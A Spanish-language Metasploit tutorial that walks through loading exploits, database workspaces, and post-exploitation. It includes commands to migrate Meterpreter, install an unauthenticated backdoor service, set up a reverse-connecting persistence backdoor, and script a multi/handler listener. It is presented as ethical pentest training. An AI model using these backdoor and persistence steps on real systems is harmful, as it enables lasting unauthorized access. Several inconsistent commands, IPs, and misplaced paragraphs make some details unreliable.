0% encontró este documento útil (0 votos)
17 vistas26 páginas

Guía Práctica Metasploit

Guía de metasploit

Cargado por

Jesus Mora
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
17 vistas26 páginas

Guía Práctica Metasploit

Guía de metasploit

Cargado por

Jesus Mora
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Página 1 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Contenido

Introducción...................................................................................................................... 3

Iniciando con Metasploit .................................................................................................. 4

Vinculando Metasploit con un Sistema de Bases de Datos ............................................ 10

Exploits relevantes para servidores ................................................................................ 13

Exploits de "Client Side" (Lado del Cliente) .................................................................... 14

Post-Explotación ............................................................................................................. 14

Automatización de Tareas Repetitivas en Metasploit .................................................... 18

Ejecución del Fichero de Recurso ............................................................................... 18

Caso de Uso Práctico: Configurando un Handler........................................................ 18

Pasos para Crear y Ejecutar el Script de Metasploit ................................................... 21

Limitación Importante ...................................................................................... 25

Lecciones clave y siguientes pasos ................................................................................. 26

Página 2 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Introducción

El presente documento tiene como objetivo ofrecer una guía práctica para iniciarse en
el uso de Metasploit, una de las herramientas más reconocidas en el ámbito del
pentesting y la ciberseguridad ofensiva. A lo largo del contenido se abordan
conceptos fundamentales, ejemplos de exploits y buenas prácticas para realizar
pruebas de seguridad de forma controlada y responsable.

Además, te comparto una excelente noticia: muy pronto estarán disponibles cursos
en línea en www.taurosecurity.com, donde podrás profundizar en temas de
ciberseguridad, comprender mejor las técnicas vistas aquí y desarrollar habilidades
prácticas con un enfoque profesional y ético.

Página 3 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Iniciando con Metasploit

Metasploit está compuesto por diversas utilidades fundamentales:

• msfconsole: La interfaz de línea de comandos principal de Metasploit.


• msfcli: Permite la ejecución directa de módulos sin necesidad de acceder a la
consola principal.
• msfpayload: Se utiliza para la creación de payloads (cargas útiles).
• msfencode: Su función es codificar los payloads, lo que puede usarse, por
ejemplo, para eliminar null bytes.
• msfvenom: Una herramienta que integra las capacidades de msfpayload y
msfencode.
• Entre otras.

Para los ejercicios que realizaremos en esta sección, centraremos nuestro trabajo en el
uso de "msfconsole".

Procederemos ahora a la puesta en marcha de Metasploit.

msfconsole

Como se puede apreciar, Metasploit informa sobre la cantidad total de elementos


contenidos en sus cinco módulos principales: exploits, auxiliary, payloads, encoders y
nops.

Página 4 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Para acceder a una guía de los comandos que están disponibles en la consola, basta con
teclear "help" y presionar la tecla Enter.

Es posible ejecutar comandos del sistema operativo anfitrión directamente desde la


consola, tal como si estuviéramos trabajando en el Shell nativo.

ls -la

Una función vital y muy práctica es el comando "search", el cual permite realizar
búsquedas dentro de la estructura de módulos de Metasploit. A modo de ilustración,
procederemos a localizar el exploit correspondiente a "vsftpd".

search ProFTPD

Página 5 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Luego de haber ubicado el exploit de interés, se procede a su carga y selección con la


instrucción "use".

La instrucción "show options" despliega los parámetros de configuración admitidos por


el exploit que se ha cargado.

use exploit/unix/ftp/vsftpd_234_backdoor

show options

Página 6 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Ciertas opciones ya incluyen valores preestablecidos de fábrica que pueden modificarse


si es necesario, mientras que otras requieren una configuración manual. Por lo tanto, si
la máquina objetivo posee la dirección IP 10.0.2.16, se emplea el comando "set" para
asignar este valor a la variable "RHOST" (Host Remoto).

set [dirección IP remota]

En lugar de emplear únicamente "set" para la definición de variables, tenemos la opción


de usar "setg" (set global). Este comando tiene la ventaja de establecer la variable, como
RHOST, de manera permanente a nivel global, lo que significa que el valor se mantendrá
configurado aunque se decida cambiar a un exploit diferente.

Cada exploit requiere una carga útil (payload) específica para ser ejecutada en el sistema
atacado, por lo que el siguiente paso es elegir uno. El comando "show payloads"
permite visualizar cuáles son las cargas útiles compatibles con el exploit que se ha
seleccionado.

show payloads

Página 7 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Una vez que hemos determinado el payload que se utilizará, procedemos a su


configuración de manera sencilla mediante el comando "set".

Al volver a ejecutar "show options", se despliegan las variables específicas del payload,
las cuales también deben ser ajustadas. La variable "LHOST" (Local Host) debe contener
la dirección IP a la que la máquina comprometida intentará establecer conexión una vez
que el payload se haya ejecutado (equipo atacante).

Página 8 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Adicionalmente, es obligatorio establecer el target (objetivo) para el exploit. Esto es


crucial porque los exploits no son universalmente compatibles con todos los sistemas
operativos, ni con todas las versiones de un mismo sistema.

El comando "show targets" permite visualizar la lista de sistemas operativos y versiones


compatibles con el exploit actualmente seleccionado.

Si el sistema operativo de nuestro equipo destino figura en la lista de sistemas


compatibles, simplemente lo seleccionamos y ya podemos proceder a la ejecución del
exploit, siempre y cuando no se necesiten ajustes adicionales en el exploit para que
acepte a nuestro objetivo.

Para confirmar si el target que elegiste en Metasploit (p. ej. ProFTPD 1.3.5) coincide con
la versión que tiene tu máquina víctima, puedes realizar un Escaneo de versión con
nmap o Usar módulos de Metasploit de solo-escaneo (si prefieres Metasploit).

Si tu máquina víctima es vulnerable a través del puerto FTP, entonces has establecido
con éxito una Shell en el equipo objetivo utilizando la infraestructura de Metasploit.

Ahora tenemos la posibilidad de preservar la configuración actual para que la próxima


vez que se inicie Metasploit, todos los ajustes permanezcan cargados y se evite la
necesidad de repetir todo el proceso de configuración previo. Esto se logra empleando
la instrucción "save", que automáticamente genera un archivo llamado "config" dentro
de la carpeta ".msf4", ubicada en el directorio del usuario que ha iniciado Metasploit
(en este ejemplo, el usuario es root).

Página 9 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Vinculando Metasploit con un Sistema de Bases de Datos

Durante un Test de Penetración (Pentest), se recoge un gran volumen de datos, que a


menudo resulta necesario reutilizar en diferentes etapas de la prueba. Para optimizar
este proceso, Metasploit puede integrarse con una base de datos PostgreSQL, lo que
posibilita guardar la información obtenida de forma organizada y que sea fácilmente
consultable.

Por defecto, la distribución Kali Linux incluye un servicio denominado "metasploit" que,
al ser inicializado, se encarga de crear la base de datos requerida y de configurar
automáticamente la conexión en el archivo "database.yml".

Este archivo de configuración se halla típicamente en la ruta /usr/share/metasploit-


framework/config/database.yml, y su ubicación exacta puede ser verificada
ejecutando el comando desde una Shell:

locate database.yml

Pasos para la Inicialización:

1. Inicializa la base de datos de Metasploit:

msfdb init

(Espera a que termine el proceso de creación/verificación de la base de datos.)

• Este comando inicializa y configura la base de datos de PostgreSQL para


Metasploit, creando el usuario y la base de datos necesarios (msf3), y
asegurando que esté lista para usarse.
• Si ya existía una base de datos, este comando la verifica y la reconfigura si es
necesario.
• En sistemas modernos, este comando también inicia automáticamente el
servicio de PostgreSQL y lo configura para que se inicie con el arranque.

Página 10 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

2. Inicia la consola de Metasploit:

msfconsole

• Metasploit se conectará automáticamente a la base de datos configurada por


msfdb init.

3. Verificación

Dentro de la consola de Metasploit (msfconsole), verifica la conexión con el comando:

db_status

• Deberías ver un mensaje indicando que postgresql está conectado, lo que


confirma que la base de datos está activa y lista para ser utilizada.

Uso de Espacios de Trabajo (Workspaces):

Una vez que la base de datos está correctamente configurada, Metasploit gestiona la
información mediante lo que se conoce como "espacios de trabajo" (workspace). Por
defecto, siempre existe un workspace denominado "default", donde se almacena toda
la información recopilada, a menos que se opte por configurar un workspace
personalizado para el proyecto específico en el que se esté trabajando.

Página 11 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

De acuerdo con las mejores prácticas, es recomendable crear un espacio de trabajo


(workspace) específico para cada PenTest que se lleve a cabo.

Gestión de Workspaces

Acción Comando en msfconsole


Crear un nuevo workspace llamado prueba workspace -a prueba
Cambiar al workspace llamado prueba workspace prueba
Ver todos los workspaces disponibles workspace
Borrar el workspace llamado prueba workspace -d prueba

Al cambiar a un workspace específico, Metasploit se encargará de almacenar en él


todos los datos que recopile al usar cualquiera de sus módulos auxiliares.

Esta información incluye detalles sobre: Máquinas (hosts), credenciales, servicios,


vulnerabilidades, y más.

El comando "hosts" nos permite visualizar un registro de todas las máquinas (hosts)
que han sido objetivo de un ataque o han sido analizadas:

hosts

Por ejemplo, si se ejecuta un ataque de fuerza bruta contra la máquina 192.168.100.39


y se logra obtener una credencial válida, esta quedará registrada. Podremos consultar
las credenciales conseguidas utilizando el comando:

creds

Página 12 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Una vez que se ha finalizado la Prueba de Intrusión, completado el informe final y


entregado al cliente, el PenTester tiene la opción de eliminar el workspace que se creó
para ese ejercicio con una simple instrucción que vimos anteriormente, (workspace -d
prueba).

Exploits relevantes para servidores

La mayoría de los exploits para servidores que están en el catálogo de Metasploit


provienen de vulnerabilidades antiguas y bien estudiadas. Aunque ante un
descubrimiento 0-day puede aparecer rápidamente un exploit para Metasploit, hoy en
día la mayor parte de los 0-days se dirigen a aplicaciones cliente y no tanto a software
servidor.

Aun así, muchos de los exploits publicados conservan eficacia en numerosos equipos no
todos los administradores aplican parches de forma rigurosa, hay entornos olvidados o
máquinas directamente accesibles desde Internet que siguen siendo susceptibles. Por
eso siguen apareciendo compromisos reales en la práctica.

Entre los módulos de Metasploit que con mayor frecuencia se emplean contra sistemas
servidores figuran, por ejemplo:

➢ MS08-067_netapi — afecta a plataformas como Windows 2003 y XP.


➢ MS06-040_netapi — orientado a Windows NT.
➢ psexec (pass-the-hash) — compatible con versiones de Windows hasta
Windows Server 2008 inclusive.
➢ Y otros módulos conocidos y todavía explotables en configuraciones
desactualizadas.

Página 13 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Exploits de "Client Side" (Lado del Cliente)

La mayoría de los nuevos exploits que surgen diariamente están relacionados con
software de escritorio. Estos se emplean para llevar a cabo ataques dirigidos a las
computadoras de los clientes, permitiendo al atacante pivotar y ganar acceso a otras
máquinas de la red local que, de otro modo, serían inaccesibles desde internet.

Estos exploits se dirigen frecuentemente a navegadores web y, de forma más específica,


a los plugins que se instalan en ellos.

Según datos de CVE-Details, por ejemplo, Oracle acumuló aproximadamente 380


vulnerabilidades distintas en el software que distribuye hasta el año 2013, de las cuales
279 ya se habían documentado. Al buscar por productos, CVE-Details indica que Flash
Player sufrió 66 vulnerabilidades en 2012, y 44 en 2013, permitiendo 43 de ellas la
ejecución de código remoto.

Para que un exploit contra un software sea efectivo, es fundamental conocer la versión
exacta de dicho programa. Esto permite identificar las vulnerabilidades específicas que
lo afectan y, en consecuencia, seleccionar el exploit apropiado.

Otra opción que ofrece Metasploit es "browser_autopwn", un módulo que levanta


todos los exploits diseñados para navegadores. Cuando recibe una conexión de un
cliente, este módulo intenta identificar su navegador y plugins mediante
"fingerprinting" y, basándose en la información, selecciona el exploit idóneo y lo lanza
contra el cliente. Es importante señalar que, en ocasiones, el "fingerprinting" puede no
determinar con precisión el software que se está utilizando.

Post-Explotación

La post-explotación se refiere al conjunto de acciones que se realizan una vez que se ha


obtenido acceso a la máquina objetivo.

Para las tareas de post-explotación, nos basaremos en una Shell de Meterpreter, que es
el payload estándar de Metasploit. Asumiremos que la máquina objetivo es un sistema
Windows (aunque gran parte de las técnicas también son aplicables en Linux), ya que es
el sistema operativo más frecuente en los entornos de trabajo.

El primer paso crucial es asegurar que el usuario de la víctima no corte nuestra


conexión, por ejemplo, cerrando accidentalmente el navegador. Para evitar esto, es
necesario migrar el proceso de meterpreter a un proceso nuevo que ya esté en
ejecución y que pertenezca a algún programa en uso.

Página 14 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Usando el comando "ps", primero se localiza el ID del proceso (PID) deseado, por
ejemplo, el de "explorer.exe".

A continuación, se ejecuta:

migrate [PID]

(sustituyendo PID por el número real), lo que provocará la migración de nuestra sesión
de meterpreter al proceso elegido.

Aunque el proceso de migración del PID (Process ID) es gestionado de forma automática
por algunos exploits, si no es el caso, es altamente aconsejable aplicarlo manualmente
tal como se ha explicado.

El paso subsiguiente es lograr la persistencia: establecer un mecanismo que permita una


conexión sencilla con el cliente en futuras ocasiones. Para conseguirlo, podemos
instalar meterpreter como un servicio en la computadora objetivo, de modo que se
mantenga a la espera de nuevas conexiones entrantes.

Por lo tanto, comenzaremos por examinar las opciones disponibles que nos ofrece el
comando "mtsvc".

La instalación del servicio es sencilla; basta con ejecutar la orden "run metsve". Esto
dejará un puerto abierto esperando conexiones.

meterpreter > run metsvc

[*] Creating a meterpreter service on port 31337


[*] Creating a temporary installation directory C:\WINDOWS\TEMP\QWVsvoYC...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
meterpreter >

Ahora, es necesario configurar un handler en Metasploit utilizando un payload


específico de "metsvc" para poder conectarnos cuando queramos y ejecutarlo.

Página 15 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

La conexión directa mediante el método anterior solo funcionará si la máquina víctima


no está protegida por un firewall que bloquee el acceso al puerto 31337 desde internet.

Otro enfoque, más robusto, es lograr que el propio equipo objetivo inicie la conexión
hacia nuestra máquina, lo que permite burlar el firewall sin inconvenientes. Esto se
consigue utilizando el script de meterpreter llamado "persistence.rb", que cumple
precisamente con este objetivo.

meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent


-L <opt> Location on target host where to write payload to, if none %TEMP% will
be used.
-P <opt> Payload to use, Default: windows/meterpreter/reverse_tcp
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

Al ejecutar el comando run persistence -X -i 60 -p 443 -r 192.168.20.64, se consigue que


la máquina de la víctima intente conectarse cada 60 segundos (parámetro -i) al puerto
443 (parámetro -p) de la dirección IP 192.168.100.64 (parámetro -r). En esta última
dirección, deberemos tener un handler de Metasploit escuchando activamente.

Prosiguiendo, la ejecución de la instrucción run persistence -X -i 60 -p 443 -r


192.168.20.64 tiene el efecto de programar el equipo atacado para que intente
establecer una conexión con el puerto 443 de la dirección 192.168.20.64 cada sesenta
segundos. En esa dirección, deberemos estar escuchando con un "handler" de
Metasploit.

Página 16 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Este exploit ha sido verificado para operar con versiones de Windows XP SP2 y SP3 en
inglés. En consecuencia, si el objetivo es usarlo contra un Windows XP SP3 en español,
no resultará funcional.

El siguiente paso es adaptar este exploit para que sea compatible con nuestro sistema
de destino. Para iniciar, debemos localizar el archivo fuente del exploit en la
estructura de directorios del sistema (su ubicación puede variar en función de cómo se
haya instalado Metasploit).

Ahora, simplemente debemos aguardar el intervalo de 60 segundos para que el servicio


de "meterpreter" que hemos instalado intente iniciar la comunicación con nuestra
instancia de Metasploit.

Consideraciones Importantes sobre la Persistencia:

Nota 1: El servicio de "meterpreter" que se instala no requiere ningún tipo de


autenticación. Esto significa que cualquier individuo que configure un handler de
Metasploit y use la dirección IP con la que se estableció el servicio, podría
potencialmente conectarse a la máquina víctima. Por esta razón, es crucial no lanzar
este servicio contra una IP pública dinámica que luego pueda ser asignada a un tercero
(como las IPs utilizadas en universidades o cibercafés). La misma advertencia aplica al
servicio "metsvc" mencionado previamente; cualquiera que logre conectarse al puerto
31337 con el payload correcto tendrá acceso.

Nota 2: El servicio "metsvc" puede ser desinstalado fácilmente ejecutando el comando


run metsvc -r desde la Shell de meterpreter. No obstante, el servicio de "persistence"
no se elimina de esta forma; es necesario quitar la clave de auto-run del registro
(HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xxxx...) y, además, terminar
el proceso "wscript.exe" que se encuentra en ejecución.

Página 17 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Automatización de Tareas Repetitivas en Metasploit

Como usuario de Metasploit, una de las técnicas más valiosas para mejorar mi eficiencia
es la automatización de tareas mediante archivos de recursos. Esto me permite guardar
secuencias largas de comandos y ejecutarlas al instante, evitando tener que teclearlas
repetidamente.

El concepto es simple: creo un fichero de texto plano con la extensión .rc (por ejemplo,
handler.rc). Dentro de este fichero, escribo los comandos de Metasploit, línea por línea,
exactamente como los escribiría en la consola msfconsole.

Ejecución del Fichero de Recurso

Una vez que tengo el script listo, tengo dos formas principales de usarlo:

1. Desde la consola de Metasploit (mientras ya estoy dentro): Simplemente uso el


comando resource seguido del nombre del archivo. Por ejemplo: resource
handler.rc.
2. Desde la Shell de Linux (para iniciar y configurar al mismo tiempo): Uso la
opción -r al iniciar Metasploit: msfconsole -r handler.rc. Esto es ideal, ya que la
consola se inicia y mi configuración ya está aplicada.

Caso de Uso Práctico: Configurando un Handler

El ejemplo que acabo de documentar es el caso de uso más común: la configuración


automática de un receptor de conexiones inversas (handler), que es fundamental en
muchos ataques de phishing o cuando espero una conexión externa.

Página 18 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Este es el contenido de mi script handler.rc:

Comando Mi Propósito (Análisis)

use exploit/multi/handler Cargo el módulo genérico que actúa como mi

oyente. Es el módulo que espera la conexión de la

víctima.

set payload Le indico al handler qué tipo de conexión debe

windows/meterpreter/reverse_tcp esperar: una sesión Meterpreter (mi shell

avanzado) desde una máquina Windows, a través

de una conexión TCP inversa.

set LHOST 192.168.100.64 Defino mi propia dirección IP (LHOST) para que la

víctima sepa dónde debe conectarse. En este

ejemplo, es 192.168.100.64.

set LPORT 443 Establezco el puerto local (LPORT) en el que estaré

escuchando. Elegí el puerto 443 ya que es a

menudo un puerto de confianza (HTTPS), lo que

ayuda a evadir posibles restricciones de firewall.

Página 19 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

set ExitOnSession false Esto es clave: Lo configuro en false para asegurar

que el handler permanezca activo después de

recibir la primera sesión. Así, puedo recibir

múltiples conexiones sin tener que reiniciar el

oyente.

exploit -j -z Ejecuto el handler. El flag -j lo pone a correr en

segundo plano (como un job) para que yo pueda

seguir utilizando la consola de Metasploit para

otras tareas mientras espero la conexión.

En resumen, al ejecutar msfconsole -r handler.rc, ahorro tiempo y me aseguro de que


el handler esté perfectamente configurado para recibir sesiones de Meterpreter en el
puerto 443. Es una forma sencilla pero poderosa de estandarizar mi flujo de trabajo.

Página 20 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Si solo tienes Kali y no tienes una máquina vulnerable de pruebas, puedes realizar la
configuración del handler usando el archivo de recursos, pero no podrás completar la
conexión porque no hay un objetivo al que atacar.

Sin embargo, te guiaré a través de los pasos para crear el archivo y ejecutar el handler
para que el lado del atacante esté listo.

Pasos para Crear y Ejecutar el Script de Metasploit

Si solo tienes Kali y no tienes una máquina vulnerable de pruebas, puedes realizar la
configuración del handler usando el archivo de recursos, pero no podrás completar la
conexión porque no hay un objetivo al que atacar.
Sin embargo, te guiaré a través de los pasos para crear el archivo y ejecutar el handler
para que el lado del atacante esté listo.
Pasos para Crear y Ejecutar el Script de Metasploit

Paso 1: Crear el Archivo de Recurso (.rc)

Vamos a crear el archivo handler.rc que contendrá los comandos de Metasploit.


1. Abre una terminal en Kali.
2. Determina tu dirección IP local (LHOST) para que el handler sepa dónde
escuchar. Ejecuta:
Hostname -I

Página 21 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Busca la dirección IP que comienza con 192.168. o 10.. Esta será tu LHOST. (Por
ejemplo, 192.168.0.29).
3. Crea el archivo usando un editor de texto (usaremos nano):

nano handler.rc

4. Pega el siguiente contenido dentro de nano, asegurándote de reemplazar


192.168.X.X con tu propia IP local que obtuviste en el paso 2:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.X.X # ¡CAMBIA ESTO POR TU IP!
set LPORT 443
set ExitOnSession false
exploit -j -z

(IMPORTANTE: No copies la frase “ # ¡CAMBIA ESTO POR TU IP! “ en el


documento porque no te reconocerá luego la IP.)

Página 22 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

5. Guarda y cierra el archivo:


• Presiona Ctrl + O (Escribir Salida/Guardar).
• Presiona Enter para confirmar el nombre del archivo.
• Presiona Ctrl + X (Salir).

Paso 2: Ejecutar el Handler Usando el Script

Ahora vamos a iniciar Metasploit y ejecutar el script que acabamos de crear con un solo
comando:

Página 23 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

1. En la misma terminal, ejecuta:

msfconsole -r handler.rc

Página 24 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Resultado:
• Metasploit (msfconsole) se iniciará.
• Automáticamente ejecutará los comandos del archivo handler.rc.
• Verás un mensaje que confirma que el "Job 0" ha comenzado a escuchar en tu
IP y puerto (192.168.X.X:443).
El handler está ahora activo y esperando en tu máquina Kali.

⚠️ Limitación Importante

Dado que no tienes una máquina vulnerable de prueba, la consola de Metasploit se


quedará "esperando" y no ocurrirá nada más.

Para probar la conexión (y realmente entender el flujo completo), necesitarías:

1. Una máquina Windows separada (puede ser otra VM de VirtualBox o VMware).


2. Generar un payload malicioso en Kali que se conecte a tu LHOST:LPORT.
3. Ejecutar ese payload en la máquina Windows para que se conecte al handler que
acabas de configurar.

Tu entorno actual es suficiente para practicar la automatización con .rc, pero no para
practicar la fase de explotación.

Página 25 de 26
DOMINA METASPLOIT – HENRIQUE ALVES CÂNDIDO

Lecciones clave y siguientes pasos

Hemos llegado al final del recorrido práctico por Metasploit. Si algo queda claro, es que
dominar esta herramienta no es solo aprender comandos: es combinar técnica, criterio
y responsabilidad. A modo de cierre, aquí tienes un resumen de lo aprendido y un plan
de acción para seguir avanzando.

Resumen rápido

• Metasploit facilita la identificación, explotación y validación de vulnerabilidades,


pero su catálogo incluye tanto fallos antiguos como algunos más recientes.
• Las pruebas efectivas requieren entornos controlados, comprensión del objetivo
(cliente vs. servidor) y parcheo activo por parte del personal responsable.
• No basta con ejecutar un módulo: interpretar resultados, medir impacto y
documentar hallazgos son habilidades igual de importantes.

Buenas prácticas (para siempre)

• Trabaja únicamente en entornos donde tengas autorización explícita.


• Mantén un registro claro de pruebas: qué se probó, con qué parámetros,
resultados y evidencias.
• Prioriza la seguridad y la ética: reporta vulnerabilidades a los propietarios de los
sistemas y evita difundir exploits sin contexto responsable.

Siguientes pasos recomendados

1. Practica en laboratorios seguros (máquinas virtuales, entornos aislados o


plataformas de laboratorio).
2. Revisa y experimenta con distintos módulos: exploits, payloads, auxiliares y post-
explotación.
3. Aprende a combinar Metasploit con otras herramientas (escáneres, sniffers,
análisis estático) para un enfoque integral.
4. Mejora tus habilidades en mitigación: aprende cómo se parchean y mitigan las
vulnerabilidades que explores.
5. Documenta y comunica: redacta informes claros y accionables para
administradores y equipos de seguridad.

Página 26 de 26

También podría gustarte